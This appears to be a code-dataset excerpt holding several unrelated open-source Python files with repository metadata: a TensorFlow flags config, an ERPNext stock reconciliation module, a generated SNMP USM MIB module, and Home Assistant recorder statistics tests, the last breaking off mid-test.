'RMSPropOptimizer, '
'ProximalGradientDescentOptimizer')
# -------------------------------- EVALUATION --------------------------------
tf.app.flags.DEFINE_boolean('eval_unique', False, "Ejecutar revisión imagen por imagen")
tf.app.flags.DEFINE_boolean('eval_unique_from_dataset', True, "Evaluar imagen por imagen desde dataset")
tf.app.flags.DEFINE_integer('eval_unique_cantidad_img', 3, "Cantidad de imagenes a evaluar si eval_unique = true")
tf.app.flags.DEFINE_string('eval_dataset', 'validation', 'Data set usado para validacion (train, validation o test')
tf.app.flags.DEFINE_boolean('eval_distort', False, "Distorcionar imagenes al evaluar")
tf.app.flags.DEFINE_boolean('eval_crop', False, "Distorcionar imagenes al evaluar")
tf.app.flags.DEFINE_integer('eval_num_examples', 2200, "Número de imagenes a evaluar")
tf.app.flags.DEFINE_integer('eval_num_examples_mini', 1000, "Número de imagenes a evaluar durante el entrenamiento")
tf.app.flags.DEFINE_integer("top_k_prediction", 1, "La predicción correcta si esta entre los k primeros resultados")
tf.app.flags.DEFINE_boolean('visualice_conv1_kernels', True, "Hacer Summary de kernels")
titulosStr = ("Fisica universita,"
"Patrones de diseño,"
"Introducción a Mineria de datos,"
"Mineria de datos a traves de ejemplos,"
"Sistemas expertos,"
"Sistemas inteligentes,"
"Big data,"
"Analisis matematico (vol 3 / Azul),"
"Einstein,"
"Analisis matematico (vol 2 / Amarillo),"
"Teoria de control,"
"Empresas de consultoría,"
"Legislación,"
"En cambio,"
"Liderazgo Guardiola,"
"Constitución Argentina,"
"El arte de conversar,"
"El señor de las moscas,"
"Revista: Epigenetica,"
"Revista: Lado oscuro del cosmos")
tf.app.flags.DEFINE_string('titulos', titulosStr, 'Titulos de los libros')
| mit | -2,154,105,897,107,655,400 | 57.174825 | 121 | 0.642505 | false |
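A sketch of how another ReconoBook script might consume the flags defined above; the `config` import name matches this file's path, and the rest is generic TensorFlow 1.x flag handling:

```python
import tensorflow as tf
import config  # noqa: F401 - importing registers the flags on tf.app.flags.FLAGS

FLAGS = tf.app.flags.FLAGS

def main(_):
    print("Input images: %dx%d" % (FLAGS.image_height, FLAGS.image_width))
    print("Classes to recognise:", FLAGS.cantidad_clases)
    print("First titles:", FLAGS.titulos.split(",")[:2])

if __name__ == "__main__":
    tf.app.run()  # parses command-line --flags, then calls main()
```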
gangadharkadam/office_erp | erpnext/stock/doctype/stock_reconciliation/stock_reconciliation.py | 1 | 11155 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
import frappe.defaults
import json
from frappe import msgprint, _
from frappe.utils import cstr, flt, cint
from erpnext.stock.stock_ledger import update_entries_after
from erpnext.controllers.stock_controller import StockController
class StockReconciliation(StockController):
def __init__(self, arg1, arg2=None):
super(StockReconciliation, self).__init__(arg1, arg2)
self.head_row = ["Item Code", "Warehouse", "Quantity", "Valuation Rate"]
def validate(self):
self.entries = []
self.validate_data()
self.validate_expense_account()
def on_submit(self):
self.insert_stock_ledger_entries()
self.make_gl_entries()
def on_cancel(self):
self.delete_and_repost_sle()
self.make_cancel_gl_entries()
def validate_data(self):
if not self.reconciliation_json:
return
data = json.loads(self.reconciliation_json)
# strip out extra columns (if any)
data = [row[:4] for row in data]
if self.head_row not in data:
msgprint(_("""Wrong Template: Unable to find head row."""),
raise_exception=1)
# remove the help part and save the json
head_row_no = 0
if data.index(self.head_row) != 0:
head_row_no = data.index(self.head_row)
data = data[head_row_no:]
self.reconciliation_json = json.dumps(data)
def _get_msg(row_num, msg):
return _("Row # {0}: ").format(row_num+head_row_no+2) + msg
self.validation_messages = []
item_warehouse_combinations = []
# validate no of rows
rows = data[1:]
if len(rows) > 100:
msgprint(_("""Sorry! We can only allow up to 100 rows for Stock Reconciliation."""),
raise_exception=True)
for row_num, row in enumerate(rows):
# find duplicates
if [row[0], row[1]] in item_warehouse_combinations:
self.validation_messages.append(_get_msg(row_num, _("Duplicate entry")))
else:
item_warehouse_combinations.append([row[0], row[1]])
self.validate_item(row[0], row_num+head_row_no+2)
# validate warehouse
if not frappe.db.get_value("Warehouse", row[1]):
self.validation_messages.append(_get_msg(row_num, _("Warehouse not found in the system")))
# if both not specified
if row[2] == "" and row[3] == "":
self.validation_messages.append(_get_msg(row_num,
_("Please specify either Quantity or Valuation Rate or both")))
# do not allow negative quantity
if flt(row[2]) < 0:
self.validation_messages.append(_get_msg(row_num,
_("Negative Quantity is not allowed")))
# do not allow negative valuation
if flt(row[3]) < 0:
self.validation_messages.append(_get_msg(row_num,
_("Negative Valuation Rate is not allowed")))
# throw all validation messages
if self.validation_messages:
for msg in self.validation_messages:
msgprint(msg)
raise frappe.ValidationError
def validate_item(self, item_code, row_num):
from erpnext.stock.doctype.item.item import validate_end_of_life, \
validate_is_stock_item, validate_cancelled_item
# using try except to catch all validation msgs and display together
try:
item = frappe.get_doc("Item", item_code)
if not item:
raise frappe.ValidationError, (_("Item: {0} not found in the system").format(item_code))
# end of life and stock item
validate_end_of_life(item_code, item.end_of_life, verbose=0)
validate_is_stock_item(item_code, item.is_stock_item, verbose=0)
# item should not be serialized
if item.has_serial_no == "Yes":
raise frappe.ValidationError, _("Serialized Item {0} cannot be updated \
using Stock Reconciliation").format(item_code)
# item managed batch-wise not allowed
if item.has_batch_no == "Yes":
raise frappe.ValidationError, _("Item: {0} managed batch-wise, can not be reconciled using \
Stock Reconciliation, instead use Stock Entry").format(item_code)
# docstatus should be < 2
validate_cancelled_item(item_code, item.docstatus, verbose=0)
except Exception, e:
self.validation_messages.append(_("Row # ") + ("%d: " % (row_num)) + cstr(e))
def insert_stock_ledger_entries(self):
""" find difference between current and expected entries
and create stock ledger entries based on the difference"""
from erpnext.stock.utils import get_valuation_method
from erpnext.stock.stock_ledger import get_previous_sle
row_template = ["item_code", "warehouse", "qty", "valuation_rate"]
if not self.reconciliation_json:
msgprint(_("""Stock Reconciliation file not uploaded"""), raise_exception=1)
data = json.loads(self.reconciliation_json)
for row_num, row in enumerate(data[data.index(self.head_row)+1:]):
row = frappe._dict(zip(row_template, row))
row["row_num"] = row_num
previous_sle = get_previous_sle({
"item_code": row.item_code,
"warehouse": row.warehouse,
"posting_date": self.posting_date,
"posting_time": self.posting_time
})
# check valuation rate mandatory
if row.qty != "" and not row.valuation_rate and \
flt(previous_sle.get("qty_after_transaction")) <= 0:
frappe.throw(_("Valuation Rate required for Item {0}").format(row.item_code))
change_in_qty = row.qty != "" and \
(flt(row.qty) - flt(previous_sle.get("qty_after_transaction")))
change_in_rate = row.valuation_rate != "" and \
(flt(row.valuation_rate) - flt(previous_sle.get("valuation_rate")))
if get_valuation_method(row.item_code) == "Moving Average":
self.sle_for_moving_avg(row, previous_sle, change_in_qty, change_in_rate)
else:
self.sle_for_fifo(row, previous_sle, change_in_qty, change_in_rate)
def sle_for_moving_avg(self, row, previous_sle, change_in_qty, change_in_rate):
"""Insert Stock Ledger Entries for Moving Average valuation"""
def _get_incoming_rate(qty, valuation_rate, previous_qty, previous_valuation_rate):
if previous_valuation_rate == 0:
return flt(valuation_rate)
else:
if valuation_rate == "":
valuation_rate = previous_valuation_rate
return (qty * valuation_rate - previous_qty * previous_valuation_rate) \
/ flt(qty - previous_qty)
if change_in_qty:
# if change in qty, irrespective of change in rate
incoming_rate = _get_incoming_rate(flt(row.qty), flt(row.valuation_rate),
flt(previous_sle.get("qty_after_transaction")),
flt(previous_sle.get("valuation_rate")))
row["voucher_detail_no"] = "Row: " + cstr(row.row_num) + "/Actual Entry"
self.insert_entries({"actual_qty": change_in_qty, "incoming_rate": incoming_rate}, row)
elif change_in_rate and flt(previous_sle.get("qty_after_transaction")) > 0:
# if no change in qty, but change in rate
# and positive actual stock before this reconciliation
incoming_rate = _get_incoming_rate(
flt(previous_sle.get("qty_after_transaction"))+1, flt(row.valuation_rate),
flt(previous_sle.get("qty_after_transaction")),
flt(previous_sle.get("valuation_rate")))
# +1 entry
row["voucher_detail_no"] = "Row: " + cstr(row.row_num) + "/Valuation Adjustment +1"
self.insert_entries({"actual_qty": 1, "incoming_rate": incoming_rate}, row)
# -1 entry
row["voucher_detail_no"] = "Row: " + cstr(row.row_num) + "/Valuation Adjustment -1"
self.insert_entries({"actual_qty": -1}, row)
def sle_for_fifo(self, row, previous_sle, change_in_qty, change_in_rate):
"""Insert Stock Ledger Entries for FIFO valuation"""
previous_stock_queue = json.loads(previous_sle.get("stock_queue") or "[]")
previous_stock_qty = sum((batch[0] for batch in previous_stock_queue))
previous_stock_value = sum((batch[0] * batch[1] for batch in \
previous_stock_queue))
def _insert_entries():
if previous_stock_queue != [[row.qty, row.valuation_rate]]:
# make entry as per attachment
if row.qty:
row["voucher_detail_no"] = "Row: " + cstr(row.row_num) + "/Actual Entry"
self.insert_entries({"actual_qty": row.qty,
"incoming_rate": flt(row.valuation_rate)}, row)
# Make reverse entry
if previous_stock_qty:
row["voucher_detail_no"] = "Row: " + cstr(row.row_num) + "/Reverse Entry"
self.insert_entries({"actual_qty": -1 * previous_stock_qty,
"incoming_rate": previous_stock_qty < 0 and
flt(row.valuation_rate) or 0}, row)
if change_in_qty:
if row.valuation_rate == "":
# dont want change in valuation
if previous_stock_qty > 0:
# set valuation_rate as previous valuation_rate
row.valuation_rate = previous_stock_value / flt(previous_stock_qty)
_insert_entries()
elif change_in_rate and previous_stock_qty > 0:
# if no change in qty, but change in rate
# and positive actual stock before this reconciliation
row.qty = previous_stock_qty
_insert_entries()
def insert_entries(self, opts, row):
"""Insert Stock Ledger Entries"""
args = frappe._dict({
"doctype": "Stock Ledger Entry",
"item_code": row.item_code,
"warehouse": row.warehouse,
"posting_date": self.posting_date,
"posting_time": self.posting_time,
"voucher_type": self.doctype,
"voucher_no": self.name,
"company": self.company,
"stock_uom": frappe.db.get_value("Item", row.item_code, "stock_uom"),
"voucher_detail_no": row.voucher_detail_no,
"fiscal_year": self.fiscal_year,
"is_cancelled": "No"
})
args.update(opts)
self.make_sl_entries([args])
# append to entries
self.entries.append(args)
def delete_and_repost_sle(self):
""" Delete Stock Ledger Entries related to this voucher
and repost future Stock Ledger Entries"""
existing_entries = frappe.db.sql("""select distinct item_code, warehouse
from `tabStock Ledger Entry` where voucher_type=%s and voucher_no=%s""",
(self.doctype, self.name), as_dict=1)
# delete entries
frappe.db.sql("""delete from `tabStock Ledger Entry`
where voucher_type=%s and voucher_no=%s""", (self.doctype, self.name))
# repost future entries for selected item_code, warehouse
for entries in existing_entries:
update_entries_after({
"item_code": entries.item_code,
"warehouse": entries.warehouse,
"posting_date": self.posting_date,
"posting_time": self.posting_time
})
def get_gl_entries(self, warehouse_account=None):
if not self.cost_center:
msgprint(_("Please enter Cost Center"), raise_exception=1)
return super(StockReconciliation, self).get_gl_entries(warehouse_account,
self.expense_account, self.cost_center)
def validate_expense_account(self):
if not cint(frappe.defaults.get_global_default("auto_accounting_for_stock")):
return
if not self.expense_account:
msgprint(_("Please enter Expense Account"), raise_exception=1)
elif not frappe.db.sql("""select * from `tabStock Ledger Entry`"""):
if frappe.db.get_value("Account", self.expense_account, "report_type") == "Profit and Loss":
frappe.throw(_("Difference Account must be a 'Liability' type account, since this Stock Reconciliation is an Opening Entry"))
@frappe.whitelist()
def upload():
from frappe.utils.datautils import read_csv_content_from_uploaded_file
csv_content = read_csv_content_from_uploaded_file()
return filter(lambda x: x and any(x), csv_content)
| agpl-3.0 | -2,882,474,033,307,407,400 | 35.335505 | 129 | 0.688839 | false |
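The shape of the spreadsheet data this DocType expects in `reconciliation_json`, inferred from `validate_data()` above; the item codes and warehouse name are placeholders:

```python
import json

head_row = ["Item Code", "Warehouse", "Quantity", "Valuation Rate"]
rows = [
    ["ITEM-0001", "Stores - C", 120, 55.0],  # set both quantity and valuation rate
    ["ITEM-0002", "Stores - C", 40, ""],     # quantity only: keep the existing rate
    ["ITEM-0003", "Stores - C", "", 12.5],   # rate only: keep the existing quantity
]

reconciliation_json = json.dumps([head_row] + rows)  # value stored on the document
```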
kdart/pycopia | mibs/pycopia/mibs/SNMP_USER_BASED_SM_MIB.py | 1 | 8334 | # python
# This file is generated by a program (mib2py). Any edits will be lost.
from pycopia.aid import Enum
import pycopia.SMI.Basetypes
Range = pycopia.SMI.Basetypes.Range
Ranges = pycopia.SMI.Basetypes.Ranges
from pycopia.SMI.Objects import ColumnObject, MacroObject, NotificationObject, RowObject, ScalarObject, NodeObject, ModuleObject, GroupObject
# imports
from SNMPv2_SMI import MODULE_IDENTITY, OBJECT_TYPE, OBJECT_IDENTITY, snmpModules, Counter32
from SNMPv2_CONF import MODULE_COMPLIANCE, OBJECT_GROUP
from SNMPv2_TC import TEXTUAL_CONVENTION, TestAndIncr, RowStatus, RowPointer, StorageType, AutonomousType
from SNMP_FRAMEWORK_MIB import SnmpAdminString, SnmpEngineID, snmpAuthProtocols, snmpPrivProtocols
class SNMP_USER_BASED_SM_MIB(ModuleObject):
path = '/usr/share/mibs/ietf/SNMP-USER-BASED-SM-MIB'
conformance = 5
name = 'SNMP-USER-BASED-SM-MIB'
language = 2
description = 'The management information definitions for the\nSNMP User-based Security Model.\n\nCopyright (C) The Internet Society (2002). This\nversion of this MIB module is part of RFC 3414;\nsee the RFC itself for full legal notices.'
# nodes
class usmNoAuthProtocol(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 10, 1, 1, 1])
name = 'usmNoAuthProtocol'
class usmHMACMD5AuthProtocol(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 10, 1, 1, 2])
name = 'usmHMACMD5AuthProtocol'
class usmHMACSHAAuthProtocol(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 10, 1, 1, 3])
name = 'usmHMACSHAAuthProtocol'
class usmNoPrivProtocol(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 10, 1, 2, 1])
name = 'usmNoPrivProtocol'
class usmDESPrivProtocol(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 10, 1, 2, 2])
name = 'usmDESPrivProtocol'
class snmpUsmMIB(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15])
name = 'snmpUsmMIB'
class usmMIBObjects(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1])
name = 'usmMIBObjects'
class usmStats(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1])
name = 'usmStats'
class usmUser(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2])
name = 'usmUser'
class usmMIBConformance(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 2])
name = 'usmMIBConformance'
class usmMIBCompliances(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 2, 1])
name = 'usmMIBCompliances'
class usmMIBGroups(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 2, 2])
name = 'usmMIBGroups'
# macros
# types
class KeyChange(pycopia.SMI.Basetypes.OctetString):
status = 1
# scalars
class usmStatsUnsupportedSecLevels(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 1])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmStatsNotInTimeWindows(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 2])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmStatsUnknownUserNames(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 3])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmStatsUnknownEngineIDs(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 4])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmStatsWrongDigests(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 5])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmStatsDecryptionErrors(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 6])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmUserSpinLock(ScalarObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 1])
syntaxobject = pycopia.SMI.Basetypes.TestAndIncr
# columns
class usmUserEngineID(ColumnObject):
access = 2
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 1])
syntaxobject = SnmpEngineID
class usmUserName(ColumnObject):
access = 2
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 2])
syntaxobject = SnmpAdminString
class usmUserSecurityName(ColumnObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 3])
syntaxobject = SnmpAdminString
class usmUserCloneFrom(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 4])
syntaxobject = pycopia.SMI.Basetypes.RowPointer
class usmUserAuthProtocol(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 5])
syntaxobject = pycopia.SMI.Basetypes.AutonomousType
class usmUserAuthKeyChange(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 6])
syntaxobject = KeyChange
class usmUserOwnAuthKeyChange(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 7])
syntaxobject = KeyChange
class usmUserPrivProtocol(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 8])
syntaxobject = pycopia.SMI.Basetypes.AutonomousType
class usmUserPrivKeyChange(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 9])
syntaxobject = KeyChange
class usmUserOwnPrivKeyChange(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 10])
syntaxobject = KeyChange
class usmUserPublic(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 11])
syntaxobject = pycopia.SMI.Basetypes.OctetString
class usmUserStorageType(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 12])
syntaxobject = pycopia.SMI.Basetypes.StorageType
class usmUserStatus(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 13])
syntaxobject = pycopia.SMI.Basetypes.RowStatus
# rows
class usmUserEntry(RowObject):
status = 1
index = pycopia.SMI.Objects.IndexObjects([usmUserEngineID, usmUserName], False)
create = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1])
access = 2
rowstatus = usmUserStatus
columns = {'usmUserEngineID': usmUserEngineID, 'usmUserName': usmUserName, 'usmUserSecurityName': usmUserSecurityName, 'usmUserCloneFrom': usmUserCloneFrom, 'usmUserAuthProtocol': usmUserAuthProtocol, 'usmUserAuthKeyChange': usmUserAuthKeyChange, 'usmUserOwnAuthKeyChange': usmUserOwnAuthKeyChange, 'usmUserPrivProtocol': usmUserPrivProtocol, 'usmUserPrivKeyChange': usmUserPrivKeyChange, 'usmUserOwnPrivKeyChange': usmUserOwnPrivKeyChange, 'usmUserPublic': usmUserPublic, 'usmUserStorageType': usmUserStorageType, 'usmUserStatus': usmUserStatus}
# notifications (traps)
# groups
class usmMIBBasicGroup(GroupObject):
access = 2
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 2, 2, 1])
group = [usmStatsUnsupportedSecLevels, usmStatsNotInTimeWindows, usmStatsUnknownUserNames, usmStatsUnknownEngineIDs, usmStatsWrongDigests, usmStatsDecryptionErrors, usmUserSpinLock, usmUserSecurityName, usmUserCloneFrom, usmUserAuthProtocol, usmUserAuthKeyChange, usmUserOwnAuthKeyChange, usmUserPrivProtocol, usmUserPrivKeyChange, usmUserOwnPrivKeyChange, usmUserPublic, usmUserStorageType, usmUserStatus]
# capabilities
# special additions
# Add to master OIDMAP.
from pycopia import SMI
SMI.update_oidmap(__name__)
| apache-2.0 | -6,750,926,250,645,303,000 | 31.940711 | 547 | 0.735781 | false |
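An illustrative lookup against the generated MIB module above; it assumes pycopia's SMI packages are installed so the module's own imports succeed:

```python
from pycopia.mibs import SNMP_USER_BASED_SM_MIB as usm

print(usm.usmStatsWrongDigests.OID)      # 1.3.6.1.6.3.15.1.1.5
print(usm.usmUserEntry.OID)              # 1.3.6.1.6.3.15.1.2.2.1
print(sorted(usm.usmUserEntry.columns))  # column names of the usmUserTable row
```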
home-assistant/home-assistant | tests/components/sensor/test_recorder.py | 1 | 19938 | """The tests for sensor recorder platform."""
# pylint: disable=protected-access,invalid-name
from datetime import timedelta
from unittest.mock import patch, sentinel
from homeassistant.components.recorder import history
from homeassistant.components.recorder.const import DATA_INSTANCE
from homeassistant.components.recorder.models import process_timestamp_to_utc_isoformat
from homeassistant.components.recorder.statistics import statistics_during_period
from homeassistant.const import STATE_UNAVAILABLE
from homeassistant.setup import setup_component
import homeassistant.util.dt as dt_util
from tests.components.recorder.common import wait_recording_done
def test_compile_hourly_statistics(hass_recorder):
"""Test compiling hourly statistics."""
hass = hass_recorder()
recorder = hass.data[DATA_INSTANCE]
setup_component(hass, "sensor", {})
zero, four, states = record_states(hass)
hist = history.get_significant_states(hass, zero, four)
assert dict(states) == dict(hist)
recorder.do_adhoc_statistics(period="hourly", start=zero)
wait_recording_done(hass)
stats = statistics_during_period(hass, zero)
assert stats == {
"sensor.test1": [
{
"statistic_id": "sensor.test1",
"start": process_timestamp_to_utc_isoformat(zero),
"mean": 15.0,
"min": 10.0,
"max": 20.0,
"last_reset": None,
"state": None,
"sum": None,
}
]
}
def test_compile_hourly_energy_statistics(hass_recorder):
"""Test compiling hourly statistics."""
hass = hass_recorder()
recorder = hass.data[DATA_INSTANCE]
setup_component(hass, "sensor", {})
sns1_attr = {"device_class": "energy", "state_class": "measurement"}
sns2_attr = {"device_class": "energy"}
sns3_attr = {}
zero, four, eight, states = record_energy_states(
hass, sns1_attr, sns2_attr, sns3_attr
)
hist = history.get_significant_states(
hass, zero - timedelta.resolution, eight + timedelta.resolution
)
assert dict(states)["sensor.test1"] == dict(hist)["sensor.test1"]
recorder.do_adhoc_statistics(period="hourly", start=zero)
wait_recording_done(hass)
recorder.do_adhoc_statistics(period="hourly", start=zero + timedelta(hours=1))
wait_recording_done(hass)
recorder.do_adhoc_statistics(period="hourly", start=zero + timedelta(hours=2))
wait_recording_done(hass)
stats = statistics_during_period(hass, zero)
assert stats == {
"sensor.test1": [
{
"statistic_id": "sensor.test1",
"start": process_timestamp_to_utc_isoformat(zero),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(zero),
"state": 20.0,
"sum": 10.0,
},
{
"statistic_id": "sensor.test1",
"start": process_timestamp_to_utc_isoformat(zero + timedelta(hours=1)),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(four),
"state": 40.0,
"sum": 10.0,
},
{
"statistic_id": "sensor.test1",
"start": process_timestamp_to_utc_isoformat(zero + timedelta(hours=2)),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(four),
"state": 70.0,
"sum": 40.0,
},
]
}
def test_compile_hourly_energy_statistics2(hass_recorder):
"""Test compiling hourly statistics."""
hass = hass_recorder()
recorder = hass.data[DATA_INSTANCE]
setup_component(hass, "sensor", {})
sns1_attr = {"device_class": "energy", "state_class": "measurement"}
sns2_attr = {"device_class": "energy", "state_class": "measurement"}
sns3_attr = {"device_class": "energy", "state_class": "measurement"}
zero, four, eight, states = record_energy_states(
hass, sns1_attr, sns2_attr, sns3_attr
)
hist = history.get_significant_states(
hass, zero - timedelta.resolution, eight + timedelta.resolution
)
assert dict(states)["sensor.test1"] == dict(hist)["sensor.test1"]
recorder.do_adhoc_statistics(period="hourly", start=zero)
wait_recording_done(hass)
recorder.do_adhoc_statistics(period="hourly", start=zero + timedelta(hours=1))
wait_recording_done(hass)
recorder.do_adhoc_statistics(period="hourly", start=zero + timedelta(hours=2))
wait_recording_done(hass)
stats = statistics_during_period(hass, zero)
assert stats == {
"sensor.test1": [
{
"statistic_id": "sensor.test1",
"start": process_timestamp_to_utc_isoformat(zero),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(zero),
"state": 20.0,
"sum": 10.0,
},
{
"statistic_id": "sensor.test1",
"start": process_timestamp_to_utc_isoformat(zero + timedelta(hours=1)),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(four),
"state": 40.0,
"sum": 10.0,
},
{
"statistic_id": "sensor.test1",
"start": process_timestamp_to_utc_isoformat(zero + timedelta(hours=2)),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(four),
"state": 70.0,
"sum": 40.0,
},
],
"sensor.test2": [
{
"statistic_id": "sensor.test2",
"start": process_timestamp_to_utc_isoformat(zero),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(zero),
"state": 130.0,
"sum": 20.0,
},
{
"statistic_id": "sensor.test2",
"start": process_timestamp_to_utc_isoformat(zero + timedelta(hours=1)),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(four),
"state": 45.0,
"sum": -95.0,
},
{
"statistic_id": "sensor.test2",
"start": process_timestamp_to_utc_isoformat(zero + timedelta(hours=2)),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(four),
"state": 75.0,
"sum": -65.0,
},
],
"sensor.test3": [
{
"statistic_id": "sensor.test3",
"start": process_timestamp_to_utc_isoformat(zero),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(zero),
"state": 5.0,
"sum": 5.0,
},
{
"statistic_id": "sensor.test3",
"start": process_timestamp_to_utc_isoformat(zero + timedelta(hours=1)),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(four),
"state": 50.0,
"sum": 30.0,
},
{
"statistic_id": "sensor.test3",
"start": process_timestamp_to_utc_isoformat(zero + timedelta(hours=2)),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(four),
"state": 90.0,
"sum": 70.0,
},
],
}
def test_compile_hourly_statistics_unchanged(hass_recorder):
"""Test compiling hourly statistics, with no changes during the hour."""
hass = hass_recorder()
recorder = hass.data[DATA_INSTANCE]
setup_component(hass, "sensor", {})
zero, four, states = record_states(hass)
hist = history.get_significant_states(hass, zero, four)
assert dict(states) == dict(hist)
recorder.do_adhoc_statistics(period="hourly", start=four)
wait_recording_done(hass)
stats = statistics_during_period(hass, four)
assert stats == {
"sensor.test1": [
{
"statistic_id": "sensor.test1",
"start": process_timestamp_to_utc_isoformat(four),
"mean": 20.0,
"min": 20.0,
"max": 20.0,
"last_reset": None,
"state": None,
"sum": None,
}
]
}
def test_compile_hourly_statistics_partially_unavailable(hass_recorder):
"""Test compiling hourly statistics, with the sensor being partially unavailable."""
hass = hass_recorder()
recorder = hass.data[DATA_INSTANCE]
setup_component(hass, "sensor", {})
zero, four, states = record_states_partially_unavailable(hass)
hist = history.get_significant_states(hass, zero, four)
assert dict(states) == dict(hist)
recorder.do_adhoc_statistics(period="hourly", start=zero)
wait_recording_done(hass)
stats = statistics_during_period(hass, zero)
assert stats == {
"sensor.test1": [
{
"statistic_id": "sensor.test1",
"start": process_timestamp_to_utc_isoformat(zero),
"mean": 17.5,
"min": 10.0,
"max": 25.0,
"last_reset": None,
"state": None,
"sum": None,
}
]
}
def test_compile_hourly_statistics_unavailable(hass_recorder):
"""Test compiling hourly statistics, with the sensor being unavailable."""
hass = hass_recorder()
recorder = hass.data[DATA_INSTANCE]
setup_component(hass, "sensor", {})
zero, four, states = record_states_partially_unavailable(hass)
hist = history.get_significant_states(hass, zero, four)
assert dict(states) == dict(hist)
recorder.do_adhoc_statistics(period="hourly", start=four)
wait_recording_done(hass)
